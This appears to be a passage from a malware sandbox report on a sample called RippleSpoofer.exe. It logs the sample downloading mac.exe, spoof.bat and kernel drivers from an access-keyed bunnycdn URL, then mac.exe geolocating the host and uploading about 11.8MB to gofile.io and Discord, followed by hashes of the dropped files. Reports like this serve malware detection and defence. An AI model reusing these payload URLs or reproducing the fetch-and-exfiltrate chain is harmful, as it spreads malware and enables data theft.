                                            Request
                                            GET /spongebob1/21902902190121290mc.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                            User-Agent: Mozilla/5.0
                                            Host: storage.bunnycdn.com
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Fri, 22 Nov 2024 13:54:10 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 48640
                                            Connection: keep-alive
                                            Content-Disposition: attachment; filename=21902902190121290mc.exe
                                            Pragma: no-cache
                                            Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
                                            ETag: "66d2133c-be00"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://storage.bunnycdn.com/spongebob1/mac.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                            RippleSpoofer.exe
                                            Remote address:
                                            109.61.89.55:443
                                            Request
                                            GET /spongebob1/mac.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                            User-Agent: Mozilla/5.0
                                            Host: storage.bunnycdn.com
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Fri, 22 Nov 2024 13:54:10 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 17487157
                                            Connection: keep-alive
                                            Content-Disposition: attachment; filename=mac.exe
                                            Pragma: no-cache
                                            Last-Modified: Sun, 17 Nov 2024 10:11:37 GMT
                                            ETag: "6739c159-10ad535"
                                            Accept-Ranges: bytes
                                          • flag-us
                                            DNS
                                            55.89.61.109.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            55.89.61.109.in-addr.arpa
                                            IN PTR
                                            Response
                                            55.89.61.109.in-addr.arpa
                                            IN PTR
                                            109-61-89-55 bunnyinfranet
                                          • flag-us
                                            DNS
                                            55.89.61.109.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            55.89.61.109.in-addr.arpa
                                            IN PTR
                                          • flag-us
                                            DNS
                                            ip-api.com
                                            mac.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            ip-api.com
                                            IN A
                                            Response
                                            ip-api.com
                                            IN A
                                            208.95.112.1
                                          • flag-us
                                            GET
                                            http://ip-api.com/json
                                            mac.exe
                                            Remote address:
                                            208.95.112.1:80
                                            Request
                                            GET /json HTTP/1.1
                                            Host: ip-api.com
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Python/3.11 aiohttp/3.11.2
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Fri, 22 Nov 2024 13:54:14 GMT
                                            Content-Type: application/json; charset=utf-8
                                            Content-Length: 291
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 60
                                            X-Rl: 44
                                          • flag-us
                                            DNS
                                            1.112.95.208.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            1.112.95.208.in-addr.arpa
                                            IN PTR
                                            Response
                                            1.112.95.208.in-addr.arpa
                                            IN PTR
                                            ip-apicom
                                          • flag-us
                                            DNS
                                            discord.com
                                            mac.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            discord.com
                                            IN A
                                            Response
                                            discord.com
                                            IN A
                                            162.159.135.232
                                            discord.com
                                            IN A
                                            162.159.137.232
                                            discord.com
                                            IN A
                                            162.159.136.232
                                            discord.com
                                            IN A
                                            162.159.138.232
                                            discord.com
                                            IN A
                                            162.159.128.233
                                          • flag-us
                                            DNS
                                            api.gofile.io
                                            mac.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            api.gofile.io
                                            IN A
                                            Response
                                            api.gofile.io
                                            IN A
                                            45.112.123.126
                                          • flag-us
                                            DNS
                                            store1.gofile.io
                                            mac.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            store1.gofile.io
                                            IN A
                                            Response
                                            store1.gofile.io
                                            IN A
                                            45.112.123.227
                                          • flag-us
                                            DNS
                                            232.135.159.162.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            232.135.159.162.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            126.123.112.45.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            126.123.112.45.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            227.123.112.45.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            227.123.112.45.in-addr.arpa
                                            IN PTR
                                            Response
                                          • 162.125.64.18:443
                                            https://www.dropbox.com/scl/fi/lymnqnkmq1u7j38npvuzz/version.json?rlkey=lmojv15nkp9kk5orfdpm4m5bs&st=usd8hokl&dl=1
                                            tls, http
                                            RippleSpoofer.exe
                                            1.3kB
                                            8.6kB
                                            14
                                            14

                                            HTTP Request

                                            GET https://www.dropbox.com/scl/fi/lymnqnkmq1u7j38npvuzz/version.json?rlkey=lmojv15nkp9kk5orfdpm4m5bs&st=usd8hokl&dl=1

                                            HTTP Response

                                            302
                                          • 162.125.64.15:443
                                            https://uc8560faba406d62e3d1cdb73d56.dl.dropboxusercontent.com/cd/0/get/Ce2uqHL3tleZfea7IYsBUu-jSW6QBEhYPFWiwTis5uMughwlu5VEFnEfPMRECjxSg0JeHJRDFQO0ZZlRXNeTacal2pmQqiSioKmEFKBfEFVtrL8GXIN76fc3p2fYI-HgDHU1r_wZ5UP-UEg_YUIaz1C1/file?dl=1
                                            tls, http
                                            RippleSpoofer.exe
                                            1.1kB
                                            5.6kB
                                            10
                                            11

                                            HTTP Request

                                            GET https://uc8560faba406d62e3d1cdb73d56.dl.dropboxusercontent.com/cd/0/get/Ce2uqHL3tleZfea7IYsBUu-jSW6QBEhYPFWiwTis5uMughwlu5VEFnEfPMRECjxSg0JeHJRDFQO0ZZlRXNeTacal2pmQqiSioKmEFKBfEFVtrL8GXIN76fc3p2fYI-HgDHU1r_wZ5UP-UEg_YUIaz1C1/file?dl=1

                                            HTTP Response

                                            200
                                          • 109.61.89.55:443
                                            https://storage.bunnycdn.com/spongebob1/mac.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                            tls, http
                                            RippleSpoofer.exe
                                            1.1MB
                                            27.3MB
                                            15060
                                            19565

                                            HTTP Request

                                            GET https://storage.bunnycdn.com/spongebob1/amigendrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://storage.bunnycdn.com/spongebob1/amifldrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://storage.bunnycdn.com/spongebob1/volumeid.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://storage.bunnycdn.com/spongebob1/volumeid64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://storage.bunnycdn.com/spongebob1/randomizer.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://storage.bunnycdn.com/spongebob1/AMIDEWINx64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://storage.bunnycdn.com/spongebob1/spoof.bat?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://storage.bunnycdn.com/spongebob1/21902902190121290mc.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://storage.bunnycdn.com/spongebob1/mac.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                            HTTP Response

                                            200
                                          • 208.95.112.1:80
                                            http://ip-api.com/json
                                            http
                                            mac.exe
                                            355 B
                                            600 B
                                            5
                                            3

                                            HTTP Request

                                            GET http://ip-api.com/json

                                            HTTP Response

                                            200
                                          • 127.0.0.1:51850
                                            mac.exe
                                          • 127.0.0.1:51857
                                            mac.exe
                                          • 127.0.0.1:51860
                                            mac.exe
                                          • 127.0.0.1:51862
                                            mac.exe
                                          • 162.159.135.232:443
                                            discord.com
                                            tls
                                            mac.exe
                                            2.7kB
                                            5.3kB
                                            9
                                            9
                                          • 162.159.135.232:443
                                            discord.com
                                            tls
                                            mac.exe
                                            1.9kB
                                            5.5kB
                                            11
                                            13
                                          • 45.112.123.126:443
                                            api.gofile.io
                                            tls
                                            mac.exe
                                            1.2kB
                                            5.8kB
                                            10
                                            10
                                          • 45.112.123.227:443
                                            store1.gofile.io
                                            tls
                                            mac.exe
                                            11.8MB
                                            98.6kB
                                            8463
                                            2281
                                          • 8.8.8.8:53
                                            8.8.8.8.in-addr.arpa
                                            dns
                                            132 B
                                            90 B
                                            2
                                            1

                                            DNS Request

                                            8.8.8.8.in-addr.arpa

                                            DNS Request

                                            8.8.8.8.in-addr.arpa

                                          • 8.8.8.8:53
                                            28.118.140.52.in-addr.arpa
                                            dns
                                            144 B
                                            158 B
                                            2
                                            1

                                            DNS Request

                                            28.118.140.52.in-addr.arpa

                                            DNS Request

                                            28.118.140.52.in-addr.arpa

                                          • 8.8.8.8:53
                                            17.114.16.2.in-addr.arpa
                                            dns
                                            70 B
                                            133 B
                                            1
                                            1

                                            DNS Request

                                            17.114.16.2.in-addr.arpa

                                          • 8.8.8.8:53
                                            71.159.190.20.in-addr.arpa
                                            dns
                                            72 B
                                            158 B
                                            1
                                            1

                                            DNS Request

                                            71.159.190.20.in-addr.arpa

                                          • 8.8.8.8:53
                                            www.dropbox.com
                                            dns
                                            RippleSpoofer.exe
                                            61 B
                                            111 B
                                            1
                                            1

                                            DNS Request

                                            www.dropbox.com

                                            DNS Response

                                            162.125.64.18

                                          • 8.8.8.8:53
                                            uc8560faba406d62e3d1cdb73d56.dl.dropboxusercontent.com
                                            dns
                                            RippleSpoofer.exe
                                            100 B
                                            161 B
                                            1
                                            1

                                            DNS Request

                                            uc8560faba406d62e3d1cdb73d56.dl.dropboxusercontent.com

                                            DNS Response

                                            162.125.64.15

                                          • 8.8.8.8:53
                                            18.64.125.162.in-addr.arpa
                                            dns
                                            72 B
                                            122 B
                                            1
                                            1

                                            DNS Request

                                            18.64.125.162.in-addr.arpa

                                          • 8.8.8.8:53
                                            15.64.125.162.in-addr.arpa
                                            dns
                                            72 B
                                            122 B
                                            1
                                            1

                                            DNS Request

                                            15.64.125.162.in-addr.arpa

                                          • 8.8.8.8:53
                                            104.219.191.52.in-addr.arpa
                                            dns
                                            73 B
                                            147 B
                                            1
                                            1

                                            DNS Request

                                            104.219.191.52.in-addr.arpa

                                          • 8.8.8.8:53
                                            200.163.202.172.in-addr.arpa
                                            dns
                                            74 B
                                            160 B
                                            1
                                            1

                                            DNS Request

                                            200.163.202.172.in-addr.arpa

                                          • 8.8.8.8:53
                                            198.187.3.20.in-addr.arpa
                                            dns
                                            71 B
                                            157 B
                                            1
                                            1

                                            DNS Request

                                            198.187.3.20.in-addr.arpa

                                          • 8.8.8.8:53
                                            106.209.201.84.in-addr.arpa
                                            dns
                                            73 B
                                            133 B
                                            1
                                            1

                                            DNS Request

                                            106.209.201.84.in-addr.arpa

                                          • 8.8.8.8:53
                                            storage.bunnycdn.com
                                            dns
                                            RippleSpoofer.exe
                                            66 B
                                            130 B
                                            1
                                            1

                                            DNS Request

                                            storage.bunnycdn.com

                                            DNS Response

                                            109.61.89.55
                                            109.61.89.53
                                            109.61.89.54
                                            185.59.220.194

                                          • 8.8.8.8:53
                                            55.89.61.109.in-addr.arpa
                                            dns
                                            142 B
                                            112 B
                                            2
                                            1

                                            DNS Request

                                            55.89.61.109.in-addr.arpa

                                            DNS Request

                                            55.89.61.109.in-addr.arpa

                                          • 8.8.8.8:53
                                            ip-api.com
                                            dns
                                            mac.exe
                                            56 B
                                            72 B
                                            1
                                            1

                                            DNS Request

                                            ip-api.com

                                            DNS Response

                                            208.95.112.1

                                          • 8.8.8.8:53
                                            1.112.95.208.in-addr.arpa
                                            dns
                                            71 B
                                            95 B
                                            1
                                            1

                                            DNS Request

                                            1.112.95.208.in-addr.arpa

                                          • 8.8.8.8:53
                                            discord.com
                                            dns
                                            mac.exe
                                            57 B
                                            137 B
                                            1
                                            1

                                            DNS Request

                                            discord.com

                                            DNS Response

                                            162.159.135.232
                                            162.159.137.232
                                            162.159.136.232
                                            162.159.138.232
                                            162.159.128.233

                                          • 8.8.8.8:53
                                            api.gofile.io
                                            dns
                                            mac.exe
                                            59 B
                                            75 B
                                            1
                                            1

                                            DNS Request

                                            api.gofile.io

                                            DNS Response

                                            45.112.123.126

                                          • 8.8.8.8:53
                                            store1.gofile.io
                                            dns
                                            mac.exe
                                            62 B
                                            78 B
                                            1
                                            1

                                            DNS Request

                                            store1.gofile.io

                                            DNS Response

                                            45.112.123.227

                                          • 8.8.8.8:53
                                            232.135.159.162.in-addr.arpa
                                            dns
                                            74 B
                                            136 B
                                            1
                                            1

                                            DNS Request

                                            232.135.159.162.in-addr.arpa

                                          • 8.8.8.8:53
                                            126.123.112.45.in-addr.arpa
                                            dns
                                            73 B
                                            127 B
                                            1
                                            1

                                            DNS Request

                                            126.123.112.45.in-addr.arpa

                                          • 8.8.8.8:53
                                            227.123.112.45.in-addr.arpa
                                            dns
                                            73 B
                                            127 B
                                            1
                                            1

                                            DNS Request

                                            227.123.112.45.in-addr.arpa

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Temp\TempAppFiles\mac.exe

                                            Filesize

                                            16.7MB

                                            MD5

                                            a4ede5823cf7d04723a5d03d769ef957

                                            SHA1

                                            c347a4c353f08dcb87a494a50de6c1cff6fe49df

                                            SHA256

                                            a7f48cd7f8b0d07a162f4fac24444f661d77ea9bd5395be63f031ef1b085b3e8

                                            SHA512

                                            d5d1227434874ea5087f57c6a6e3aaee889f8cb185cfe092c72fe7764200a73f03b549081418dd81eb54ae3dc1e566b77b8d15dae4ade3c76482ad8ee55e45b7

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\VCRUNTIME140.dll

                                            Filesize

                                            96KB

                                            MD5

                                            f12681a472b9dd04a812e16096514974

                                            SHA1

                                            6fd102eb3e0b0e6eef08118d71f28702d1a9067c

                                            SHA256

                                            d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

                                            SHA512

                                            7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\_asyncio.pyd

                                            Filesize

                                            34KB

                                            MD5

                                            1b8ce772a230a5da8cbdccd8914080a5

                                            SHA1

                                            40d4faf1308d1af6ef9f3856a4f743046fd0ead5

                                            SHA256

                                            fa5a1e7031de5849ab2ab5a177e366b41e1df6bbd90c8d2418033a01c740771f

                                            SHA512

                                            d2fc21b9f58b57065b337c3513e7e6c3e2243b73c5a230e81c91dafcb6724b521ad766667848ba8d0a428d530691ffc4020de6ce9ce1eaa2bf5e15338114a603

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\_bz2.pyd

                                            Filesize

                                            46KB

                                            MD5

                                            80c69a1d87f0c82d6c4268e5a8213b78

                                            SHA1

                                            bae059da91d48eaac4f1bb45ca6feee2c89a2c06

                                            SHA256

                                            307359f1b2552b60839385eb63d74cbfe75cd5efdb4e7cd0bb7d296fa67d8a87

                                            SHA512

                                            542cf4ba19dd6a91690340779873e0cb8864b28159f55917f98a192ff9c449aba2d617e9b2b3932ddfeee13021706577ab164e5394e0513fe4087af6bc39d40d

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\_cffi_backend.cp311-win_amd64.pyd

                                            Filesize

                                            71KB

                                            MD5

                                            0f0f1c4e1d043f212b00473a81c012a3

                                            SHA1

                                            ff9ff3c257dceefc74551e4e2bacde0faaef5aec

                                            SHA256

                                            fda255664cbf627cb6a9cd327daf4e3eb06f4f0707ed2615e86e2e99b422ad0b

                                            SHA512

                                            fcfa42f417e319bddf721f298587d1b26e6974e5d7589dfe6ddd2b013bc554a53db3725741fbc4941f34079ed8cb96f05934f3c2b933cda6a7e19cda315591a7

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\_ctypes.pyd

                                            Filesize

                                            57KB

                                            MD5

                                            b4c41a4a46e1d08206c109ce547480c7

                                            SHA1

                                            9588387007a49ec2304160f27376aedca5bc854d

                                            SHA256

                                            9925ab71a4d74ce0ccc036034d422782395dd496472bd2d7b6d617f4d6ddc1f9

                                            SHA512

                                            30debb8e766b430a57f3f6649eeb04eb0aad75ab50423252585db7e28a974d629eb81844a05f5cb94c1702308d3feda7a7a99cb37458e2acb8e87efc486a1d33

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-console-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            e8b9d74bfd1f6d1cc1d99b24f44da796

                                            SHA1

                                            a312cfc6a7ed7bf1b786e5b3fd842a7eeb683452

                                            SHA256

                                            b1b3fd40ab437a43c8db4994ccffc7f88000cc8bb6e34a2bcbff8e2464930c59

                                            SHA512

                                            b74d9b12b69db81a96fc5a001fd88c1e62ee8299ba435e242c5cb2ce446740ed3d8a623e1924c2bc07bfd9aef7b2577c9ec8264e53e5be625f4379119bafcc27

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-datetime-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            cfe0c1dfde224ea5fed9bd5ff778a6e0

                                            SHA1

                                            5150e7edd1293e29d2e4d6bb68067374b8a07ce6

                                            SHA256

                                            0d0f80cbf476af5b1c9fd3775e086ed0dfdb510cd0cc208ec1ccb04572396e3e

                                            SHA512

                                            b0e02e1f19cfa7de3693d4d63e404bdb9d15527ac85a6d492db1128bb695bffd11bec33d32f317a7615cb9a820cd14f9f8b182469d65af2430ffcdbad4bd7000

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-debug-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            33bbece432f8da57f17bf2e396ebaa58

                                            SHA1

                                            890df2dddfdf3eeccc698312d32407f3e2ec7eb1

                                            SHA256

                                            7cf0944901f7f7e0d0b9ad62753fc2fe380461b1cce8cdc7e9c9867c980e3b0e

                                            SHA512

                                            619b684e83546d97fc1d1bc7181ad09c083e880629726ee3af138a9e4791a6dcf675a8df65dc20edbe6465b5f4eac92a64265df37e53a5f34f6be93a5c2a7ae5

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-errorhandling-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            eb0978a9213e7f6fdd63b2967f02d999

                                            SHA1

                                            9833f4134f7ac4766991c918aece900acfbf969f

                                            SHA256

                                            ab25a1fe836fc68bcb199f1fe565c27d26af0c390a38da158e0d8815efe1103e

                                            SHA512

                                            6f268148f959693ee213db7d3db136b8e3ad1f80267d8cbd7d5429c021adaccc9c14424c09d527e181b9c9b5ea41765aff568b9630e4eb83bfc532e56dfe5b63

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-file-l1-1-0.dll

                                            Filesize

                                            25KB

                                            MD5

                                            efad0ee0136532e8e8402770a64c71f9

                                            SHA1

                                            cda3774fe9781400792d8605869f4e6b08153e55

                                            SHA256

                                            3d2c55902385381869db850b526261ddeb4628b83e690a32b67d2e0936b2c6ed

                                            SHA512

                                            69d25edf0f4c8ac5d77cb5815dfb53eac7f403dc8d11bfe336a545c19a19ffde1031fa59019507d119e4570da0d79b95351eac697f46024b4e558a0ff6349852

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-file-l1-2-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            1c58526d681efe507deb8f1935c75487

                                            SHA1

                                            0e6d328faf3563f2aae029bc5f2272fb7a742672

                                            SHA256

                                            ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

                                            SHA512

                                            8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-file-l2-1-0.dll

                                            Filesize

                                            18KB

                                            MD5

                                            bfffa7117fd9b1622c66d949bac3f1d7

                                            SHA1

                                            402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

                                            SHA256

                                            1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

                                            SHA512

                                            b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-handle-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            e89cdcd4d95cda04e4abba8193a5b492

                                            SHA1

                                            5c0aee81f32d7f9ec9f0650239ee58880c9b0337

                                            SHA256

                                            1a489e0606484bd71a0d9cb37a1dc6ca8437777b3d67bfc8c0075d0cc59e6238

                                            SHA512

                                            55d01e68c8c899e99a3c62c2c36d6bcb1a66ff6ecd2636d2d0157409a1f53a84ce5d6f0c703d5ed47f8e9e2d1c9d2d87cc52585ee624a23d92183062c999b97e

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-heap-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            accc640d1b06fb8552fe02f823126ff5

                                            SHA1

                                            82ccc763d62660bfa8b8a09e566120d469f6ab67

                                            SHA256

                                            332ba469ae84aa72ec8cce2b33781db1ab81a42ece5863f7a3cb5a990059594f

                                            SHA512

                                            6382302fb7158fc9f2be790811e5c459c5c441f8caee63df1e09b203b8077a27e023c4c01957b252ac8ac288f8310bcee5b4dcc1f7fc691458b90cdfaa36dcbe

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-interlocked-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            c6024cc04201312f7688a021d25b056d

                                            SHA1

                                            48a1d01ae8bc90f889fb5f09c0d2a0602ee4b0fd

                                            SHA256

                                            8751d30df554af08ef42d2faa0a71abcf8c7d17ce9e9ff2ea68a4662603ec500

                                            SHA512

                                            d86c773416b332945acbb95cbe90e16730ef8e16b7f3ccd459d7131485760c2f07e95951aeb47c1cf29de76affeb1c21bdf6d8260845e32205fe8411ed5efa47

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-libraryloader-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            1f2a00e72bc8fa2bd887bdb651ed6de5

                                            SHA1

                                            04d92e41ce002251cc09c297cf2b38c4263709ea

                                            SHA256

                                            9c8a08a7d40b6f697a21054770f1afa9ffb197f90ef1eee77c67751df28b7142

                                            SHA512

                                            8cf72df019f9fc9cd22ff77c37a563652becee0708ff5c6f1da87317f41037909e64dcbdcc43e890c5777e6bcfa4035a27afc1aeeb0f5deba878e3e9aef7b02a

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-localization-l1-2-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            724223109e49cb01d61d63a8be926b8f

                                            SHA1

                                            072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

                                            SHA256

                                            4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

                                            SHA512

                                            19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-memory-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            3c38aac78b7ce7f94f4916372800e242

                                            SHA1

                                            c793186bcf8fdb55a1b74568102b4e073f6971d6

                                            SHA256

                                            3f81a149ba3862776af307d5c7feef978f258196f0a1bf909da2d3f440ff954d

                                            SHA512

                                            c2746aa4342c6afffbd174819440e1bbf4371a7fed29738801c75b49e2f4f94fd6d013e002bad2aadafbc477171b8332c8c5579d624684ef1afbfde9384b8588

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-namedpipe-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            321a3ca50e80795018d55a19bf799197

                                            SHA1

                                            df2d3c95fb4cbb298d255d342f204121d9d7ef7f

                                            SHA256

                                            5476db3a4fecf532f96d48f9802c966fdef98ec8d89978a79540cb4db352c15f

                                            SHA512

                                            3ec20e1ac39a98cb5f726d8390c2ee3cd4cd0bf118fdda7271f7604a4946d78778713b675d19dd3e1ec1d6d4d097abe9cd6d0f76b3a7dff53ce8d6dbc146870a

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-processenvironment-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            0462e22f779295446cd0b63e61142ca5

                                            SHA1

                                            616a325cd5b0971821571b880907ce1b181126ae

                                            SHA256

                                            0b6b598ec28a9e3d646f2bb37e1a57a3dda069a55fba86333727719585b1886e

                                            SHA512

                                            07b34dca6b3078f7d1e8ede5c639f697c71210dcf9f05212fd16eb181ab4ac62286bc4a7ce0d84832c17f5916d0224d1e8aab210ceeff811fc6724c8845a74fe

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-processthreads-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            c3632083b312c184cbdd96551fed5519

                                            SHA1

                                            a93e8e0af42a144009727d2decb337f963a9312e

                                            SHA256

                                            be8d78978d81555554786e08ce474f6af1de96fcb7fa2f1ce4052bc80c6b2125

                                            SHA512

                                            8807c2444a044a3c02ef98cf56013285f07c4a1f7014200a21e20fcb995178ba835c30ac3889311e66bc61641d6226b1ff96331b019c83b6fcc7c87870cce8c4

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-processthreads-l1-1-1.dll

                                            Filesize

                                            21KB

                                            MD5

                                            517eb9e2cb671ae49f99173d7f7ce43f

                                            SHA1

                                            4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

                                            SHA256

                                            57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

                                            SHA512

                                            492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-profile-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            f3ff2d544f5cd9e66bfb8d170b661673

                                            SHA1

                                            9e18107cfcd89f1bbb7fdaf65234c1dc8e614add

                                            SHA256

                                            e1c5d8984a674925fa4afbfe58228be5323fe5123abcd17ec4160295875a625f

                                            SHA512

                                            184b09c77d079127580ef80eb34bded0f5e874cefbe1c5f851d86861e38967b995d859e8491fcc87508930dc06c6bbf02b649b3b489a1b138c51a7d4b4e7aaad

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-rtlsupport-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            a0c2dbe0f5e18d1add0d1ba22580893b

                                            SHA1

                                            29624df37151905467a223486500ed75617a1dfd

                                            SHA256

                                            3c29730df2b28985a30d9c82092a1faa0ceb7ffc1bd857d1ef6324cf5524802f

                                            SHA512

                                            3e627f111196009380d1687e024e6ffb1c0dcf4dcb27f8940f17fec7efdd8152ff365b43cb7fdb31de300955d6c15e40a2c8fb6650a91706d7ea1c5d89319b12

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-string-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            2666581584ba60d48716420a6080abda

                                            SHA1

                                            c103f0ea32ebbc50f4c494bce7595f2b721cb5ad

                                            SHA256

                                            27e9d3e7c8756e4512932d674a738bf4c2969f834d65b2b79c342a22f662f328

                                            SHA512

                                            befed15f11a0550d2859094cc15526b791dadea12c2e7ceb35916983fb7a100d89d638fb1704975464302fae1e1a37f36e01e4bef5bc4924ab8f3fd41e60bd0c

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-synch-l1-1-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            225d9f80f669ce452ca35e47af94893f

                                            SHA1

                                            37bd0ffc8e820247bd4db1c36c3b9f9f686bbd50

                                            SHA256

                                            61c0ebe60ce6ebabcb927ddff837a9bf17e14cd4b4c762ab709e630576ec7232

                                            SHA512

                                            2f71a3471a9868f4d026c01e4258aff7192872590f5e5c66aabd3c088644d28629ba8835f3a4a23825631004b1afd440efe7161bb9fc7d7c69e0ee204813ca7b

                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50082\api-ms-win-core-synch-l1-2-0.dll

                                            Filesize

                                            21KB

                                            MD5

                                            1281e9d1750431d2fe3b480a8175d45c

                                            SHA1

                                            bc982d1c750b88dcb4410739e057a86ff02d07ef

                                            SHA256

                                            433bd8ddc4f79aee65ca94a54286d75e7d92b019853a883e51c2b938d2469baa

                                            SHA512

